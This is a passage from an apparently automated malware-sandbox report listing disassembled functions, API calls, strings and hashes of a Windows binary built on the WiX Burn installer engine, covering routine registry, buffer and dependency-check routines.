                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 009174C2
                                                                                                                                                                    • Part of subcall function 00914456: SetLastError.KERNEL32(00000000,?,?,?), ref: 0091446B
                                                                                                                                                                    • Part of subcall function 00914456: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0091447A
                                                                                                                                                                    • Part of subcall function 00914456: GetLastError.KERNEL32(?,?,?), ref: 00914484
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get current process path., xrefs: 00917462
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917416, 009174AD
                                                                                                                                                                  • Unable to get resume command line from the registry, xrefs: 0091743E
                                                                                                                                                                  • Failed to open run once log., xrefs: 00917404
                                                                                                                                                                  • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 0091749B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CloseFileHandleModuleName
                                                                                                                                                                  • String ID: Failed to get current process path.$Failed to open run once log.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 628991300-2798336238
                                                                                                                                                                  • Opcode ID: 624dca3751359407746e53225aaa0e803b1696e1b0bdcf1e73795f6fa348e9a9
                                                                                                                                                                  • Instruction ID: 401b706a33222dbd62cfc9c1da957c02338b994dcb34af8aec3e3abe39ab7888
                                                                                                                                                                  • Opcode Fuzzy Hash: 624dca3751359407746e53225aaa0e803b1696e1b0bdcf1e73795f6fa348e9a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 8931C672F4461EB7DB22ABD08C46FDEFB7DAF44740F108165B604B62D0E670AA848B90
                                                                                                                                                                  Function 009598BA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009598B1,009596CC,00957194), ref: 009598C8
                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009598D6
                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009598EF
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,009598B1,009596CC,00957194), ref: 00959941
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                  • Opcode ID: 6fbb48e0b8dbd8624a8651cfa80db80df29ed379841c0e24330d965387f7d6c8
                                                                                                                                                                  • Instruction ID: 3a0cf59595c8bea70c4b6a161360018b9eb8db458c3f547e51c70d9a77bfa186
                                                                                                                                                                  • Opcode Fuzzy Hash: 6fbb48e0b8dbd8624a8651cfa80db80df29ed379841c0e24330d965387f7d6c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5301D87213E322DEFB14A77B7C85B5A2658EF43776720122DFD14591E1EF114C09A340
                                                                                                                                                                  Function 0091A8A3 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00917D5B,WixBundleOriginalSource,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB,?,?), ref: 0091A8AF
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00917D5B,00917D5B,00000000,00000000,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB), ref: 0091A934
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 0091A912
                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 0091A8AB
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091A8E9
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A924
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-3124624316
                                                                                                                                                                  • Opcode ID: d463ec8839f6edc67510546708bc2ed3b6913b4a6882cf6229873abb0606f5ab
                                                                                                                                                                  • Instruction ID: ffd0df1d0cddf13e4ab6dadc6f666fbade421a7fd066eb352bcf7ea1bfea7fda
                                                                                                                                                                  • Opcode Fuzzy Hash: d463ec8839f6edc67510546708bc2ed3b6913b4a6882cf6229873abb0606f5ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 6101C472B4222CBBDF215F40CC0AFDE7A689F04765F114150F904AA2A1D6B59ED0AB91
                                                                                                                                                                  Function 00930121 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,024B6805,000000FF,comres.dll,000000FF,00000000,?,00000000,00000000,comres.dll,wininet.dll,00000000,00916DEA,00000000,FF1C4389), ref: 00930207
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed dependents check on package provider: %ls$comres.dll$d:\a\wix4\wix4\src\burn\engine\dependency.cpp$wininet.dll
                                                                                                                                                                  • API String ID: 1825529933-2816589420
                                                                                                                                                                  • Opcode ID: f26aa4242a945c5b4a16975a79cbbd94231a67e194a785f56aa2cd943a6c2a21
                                                                                                                                                                  • Instruction ID: b4757e1eff829b327784adebf80bbdf7c0c3e3ab12a92b92f4936b68180034c4
                                                                                                                                                                  • Opcode Fuzzy Hash: f26aa4242a945c5b4a16975a79cbbd94231a67e194a785f56aa2cd943a6c2a21
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B518330A01616EFCB18DF94C899B9FBBB9FF85714F104219E5699B241C3B09991CFD1
                                                                                                                                                                  Function 00928201 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 104registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024,?,?,?,00935E95,000000F8), ref: 00928317
                                                                                                                                                                    • Part of subcall function 0096CCD3: RegQueryValueExW.ADVAPI32(?,?,?,0092828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0096CD06
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to read Resume value., xrefs: 009282AE
                                                                                                                                                                  • Failed to open registration key., xrefs: 0092824A
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 0092825C
                                                                                                                                                                  • Resume, xrefs: 00928280
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                  • String ID: Failed to open registration key.$Failed to read Resume value.$Resume$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3356406503-1502274520
                                                                                                                                                                  • Opcode ID: 5184bd1f297f5702bf681d19688c30f56985965d9d42a70d1f9d20537c9db398
                                                                                                                                                                  • Instruction ID: 545cdda6c3efebb035c596b56138b9cf11b2b55905a0d5355ff6ee1d5cd52a55
                                                                                                                                                                  • Opcode Fuzzy Hash: 5184bd1f297f5702bf681d19688c30f56985965d9d42a70d1f9d20537c9db398
                                                                                                                                                                  • Instruction Fuzzy Hash: B4310431652635EFD7229E98EC49BAF7BA8EF40750F114161F821AB258DA74DD40C790
                                                                                                                                                                  Function 0097729B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 96registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00020019,?,?,00916E9A,00000001,00916DEA), ref: 00977376
                                                                                                                                                                    • Part of subcall function 009771E2: RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00916E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0097728C
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 00977308
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 009772C5
                                                                                                                                                                  • Failed to open uninstall registry key., xrefs: 009772F9
                                                                                                                                                                  • Failed to enumerate uninstall key for related bundles., xrefs: 0097738C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$Open
                                                                                                                                                                  • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                  • API String ID: 2976201327-4270664815
                                                                                                                                                                  • Opcode ID: ed135120f58426547d51b06803b104d20bbfc4952e0bb82815d1fd47df867708
                                                                                                                                                                  • Instruction ID: 9210afb2092d7a09b7f66042ff4ff9b3feed9f44a37bb8e3770502f878f094a3
                                                                                                                                                                  • Opcode Fuzzy Hash: ed135120f58426547d51b06803b104d20bbfc4952e0bb82815d1fd47df867708
                                                                                                                                                                  • Instruction Fuzzy Hash: 33210433F48229FADB219AE49C46FAEFA78DB84710F158461BE19BA151D2748E40E790
                                                                                                                                                                  Function 0096A0F5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%ls', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                                  • API String ID: 2001391462-4099103365
                                                                                                                                                                  • Opcode ID: b0522e39c6ee8b450124fd37fc3e8bad4e93887170dc258936cddb6bd7e1be42
                                                                                                                                                                  • Instruction ID: 941adf77e23eb2725e410e582f441a8aca30bb6fd2c7d7e25708817c64b26782
                                                                                                                                                                  • Opcode Fuzzy Hash: b0522e39c6ee8b450124fd37fc3e8bad4e93887170dc258936cddb6bd7e1be42
                                                                                                                                                                  • Instruction Fuzzy Hash: B921E472A04319BFEB109F44CC85FAFBB6CEF47764F110115FA14A7281E6709E119BA1
                                                                                                                                                                  Function 00915B8D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to get full path for: %ls$Failed to get parent directory for path: %ls$Full path was not rooted: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                                  • API String ID: 0-281674368
                                                                                                                                                                  • Opcode ID: ee7ca619314136df40b453d787c1ef69210bbf30ebc2463f56260e7c57692620
                                                                                                                                                                  • Instruction ID: faa6fa6a4267ddeed2ae7742df02aa2eb5ab2188b0260ed2fcb9e80b7be659bd
                                                                                                                                                                  • Opcode Fuzzy Hash: ee7ca619314136df40b453d787c1ef69210bbf30ebc2463f56260e7c57692620
                                                                                                                                                                  • Instruction Fuzzy Hash: 1321B7B1B4070CF6EB20AE95CD46FEF7ABC9BD0B00F120155B945F61D1E6B1DE9096A0
                                                                                                                                                                  Function 00930A39 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,55000CC2,000000FF,FFBC8CE8,000000FF,00916CF2,5600980C,F685F08B,00000000,00000000,0091721E,00917222,00917162,00000000,00916DEA), ref: 00930AFF
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,8351EC8B,000000FF,FFBC8CE8,000000FF,00916CF2,5600980C,F685F08B,00000000,00000000,0091721E,00917222,00917162,00000000,00916DEA), ref: 00930B2B
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00930A61
                                                                                                                                                                  • Failed dependents check on bundle., xrefs: 00930AAE
                                                                                                                                                                  • Failed to detect provider key bundle id., xrefs: 00930A4F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed dependents check on bundle.$Failed to detect provider key bundle id.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                  • API String ID: 1825529933-872169753
                                                                                                                                                                  • Opcode ID: 611866df02d81935909bb6bab6b80c925b9873c5682dc574ac9f3712d2b33a32
                                                                                                                                                                  • Instruction ID: 7111dc79bbcffd69da785565f6f412004ca6b4243f8878f5f481a88862702c53
                                                                                                                                                                  • Opcode Fuzzy Hash: 611866df02d81935909bb6bab6b80c925b9873c5682dc574ac9f3712d2b33a32
                                                                                                                                                                  • Instruction Fuzzy Hash: D931C131640225FBEF259B54DC5AF9AFA78BB44724F204345F518AB1D1D3B0AD90CBD0
                                                                                                                                                                  Function 0096A1E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%hs', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                                  • API String ID: 2001391462-3750679403
                                                                                                                                                                  • Opcode ID: 52951f55f846960590fab1c32d6e9e0547a8441c92b368bc84e8dac8f14814c8
                                                                                                                                                                  • Instruction ID: 7e8a61f77c9eb23fa8f0491a188a245a6eac85a0391fd66d5e946db44265c23a
                                                                                                                                                                  • Opcode Fuzzy Hash: 52951f55f846960590fab1c32d6e9e0547a8441c92b368bc84e8dac8f14814c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 7921F771B40318BBEB119E44CC85FEF7BACEF86764F010515F910AB281E671DD109AA1
                                                                                                                                                                  Function 0096BCAF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096BCD0
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0096BCDA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastLookupPrivilegeValue
                                                                                                                                                                  • String ID: Failed to get privilege LUID: %ls$Failed to get token privilege information.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 2626710698-2191672025
                                                                                                                                                                  • Opcode ID: ab8fda49424d4a4796441057ffae84047ef7908ad5b025ec88bf86fb3c363047
                                                                                                                                                                  • Instruction ID: a0dfdb8106051e8d6beebcda66daf4d44aa4bf082f1939c4463aa22efce45bdf
                                                                                                                                                                  • Opcode Fuzzy Hash: ab8fda49424d4a4796441057ffae84047ef7908ad5b025ec88bf86fb3c363047
                                                                                                                                                                  • Instruction Fuzzy Hash: FE21A6B2A00218BBDB219A49DC95FAE7BBCDF95710F114051FE14EB291E3749E8096A1
                                                                                                                                                                  Function 0093FC87 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0093FCBA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize package from related bundle id: %ls, xrefs: 0093FD1E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp, xrefs: 0093FD30, 0093FD62
                                                                                                                                                                  • Failed to ensure there is space for related bundles., xrefs: 0093FCE5
                                                                                                                                                                  • Failed to detect dependencies for related bundle., xrefs: 0093FD50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to detect dependencies for related bundle.$Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp
                                                                                                                                                                  • API String ID: 1825529933-344177745
                                                                                                                                                                  • Opcode ID: e6a3d02584568216583d34ce1054e38df8574b942e91aa0785a504c1009471fb
                                                                                                                                                                  • Instruction ID: 4b78bb1330e013e659348fe1936bbf0142ea76b10df1dccfeba62a427d7a0637
                                                                                                                                                                  • Opcode Fuzzy Hash: e6a3d02584568216583d34ce1054e38df8574b942e91aa0785a504c1009471fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 6221B532E41624BBDF129F58CC46FAABB65EF49720F104261FD24AE1D1E3B0D850DB91
                                                                                                                                                                  Function 0095620A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(0097E860,000000FF), ref: 009562B4
